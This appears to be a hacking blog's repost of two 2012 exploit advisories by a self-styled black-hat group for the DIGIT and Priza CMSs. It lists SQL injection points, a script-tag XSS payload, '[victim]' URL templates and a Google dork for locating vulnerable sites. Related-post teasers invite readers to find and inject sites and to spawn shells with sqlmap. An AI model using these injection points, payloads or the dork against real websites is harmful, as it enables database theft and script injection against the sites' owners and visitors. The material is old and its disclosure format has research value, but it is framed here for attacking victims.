DIGIT Israel Cms SQL Injection / XSS Multiple Vulnerability
Author : BHG Security Center
Date : 2012-01-05
Location : Iran
Web : http://Black-Hg.Org
Critical Lvl : Medium
Where : From Remote
My Group : Black Hat Group #BHG
[PoC] : /website_path/Default.asp?sType=0&PageId=[Sqli]
Enter In Search Box XSS Code
<FORM action="Default.asp?PageId=-1" method=POST id=searchFORM name=searchFORMstyle="margin:0;padding:0"><INPUT type="hidden" value="" name="txtSEARCH">
</FORM>
[PoC] : Http://[victim]/path/Default.asp
Note : There are vulnerabilities in the search field that you can use
Timeline:
~~~~~~~
- 02 - 01 - 2012 bug found.
- 03 - 01 - 2012 vendor contacted, but no response.
- 05 - 01 - 2012 Advisories release.
Important Notes:
~~~~~~~~~~~~~
- Vendor did not respond to the email as well as the phone. As there is not any contact form or email address in
- the website, we have used all the emails which had been found by searching in Google such as support, info, and so on.
Priza Israel Cms SQL Injection / XSS Multiple Vulnerability
# Exploit Title: Priza Israel Cms SQL Injection / XSS Multiple Vulnerability
# Date: 2012-01-05 [GMT +7]
# Author: BHG Security Center
# Software Link: http://www.priza.co.il/
# Vendor Response(s): They didn't respond to the emails.
# Dork: intext:"Powered by Priza"
# Version : [0.0.2]
# Tested on: ubuntu 11.04
# CVE : -
# Finder(s):
- Net.Edit0r (Net.edit0r [at] att [dot] net)
- G3n3Rall (Ant1_s3cur1ty [at] yahoo [dot] com)
Author : BHG Security Center
Date : 2012-01-05
Location : Iran
Web : http://Black-Hg.Org
Critical Lvl : Medium
Where : From Remote
My Group : Black Hat Group #BHG
---------------------------------------------------------------------------
[PoC] : /website_path/index.asp?p_id=201&id=[SQLi]
[PoC] : /website_path/index.asp?page_id=[SQLi]
[PoC] : /website_path/volumes.asp?id=18
[PoC] : /website_path/index.asp?action=find&page_id=28&string=[Xss]
[PoC] : Http://[victim]/path/index.asp?p_id=201&id=[SQLi]
[PoC] : Http://[victim]/path/index.asp?action=find&page_id=28&string="><script>alert(0)</script>
Timeline:
~~~~~~~
- 02 - 01 - 2012 bug found.
- 03 - 01 - 2012 vendor contacted, but no response.
- 05 - 01 - 2012 Advisories release.
Important Notes:
~~~~~~~~~
- Vendor did not respond to the email as well as the phone. As there is not any contact form or email address in
- the website, we have used all the emails which had been found by searching in Google such as support, info, and so on.
January 6, 2012
Related Posts
Tricky Log In to MySQL
Ada banyak cara untuk melakukan Log In MySQL. Kebanyakan dilakukan dengan Web Shell yang memiliki fitur koneksi ke data...[Information Gathering] Network Mapper
Pada postingan sebelumnya, kita telah membahas tahap-tahap melakukan aksi hacking. Diantaranya adalah: Information ...[Reconnaissance] SQL Injection 3 January 2012
Feel free to find vulnerable site, to perform SQL Injection! Do you like to perform SQL Injection? Are you a desperat...SQL Injection Level 4 [Part 1]
Bosan dengan perintah (select group_concat(table_name) from information schema.tables where table_schema=database())...From Bug to 0day Against LINUX
Sebelumnya pernah dijelaskan bagaimana caranya mengaplikasikan teori from bug to 0day yang dijelaskan red-dragon. Sekar...Spawn Shell With SQLmap
Belakangan ini, tema post yang saya berikan selalu berbau SQL Injection. Saya harap pembaca tidak bosan membaca tutoria...[RECONNAISSANCE] SQL Injection 5 January
Posse Softball Director CMS Blind SQL Injection Vulnerability [+] Autor: easy laster [+] Vulnerabilities [Blind SQ...NMAP Stealth Screen Shot
Bulan Juli ini, kita akan terus membicarakan tahap Reconnaissance. Reconnaissance adalah tahap pertama dalam siklus pen...SQL Injection Level 4 [Final]
Setelah kita menjalani tiga step dari SQL Injection level 4, akhirnya kita sampai di tahap final. Tahap final adalah ta...Introducing Autoscan
Anda yang terbiasa melakukan penetrasi test dalam sebuah network, pasti mengenal nmap sebagai network scanner. Kemampua...
Subscribe to:
Post Comments (Atom)
0 comment:
Post a Comment
Click to see the code!
To insert emoticon you must added at least one space before the code.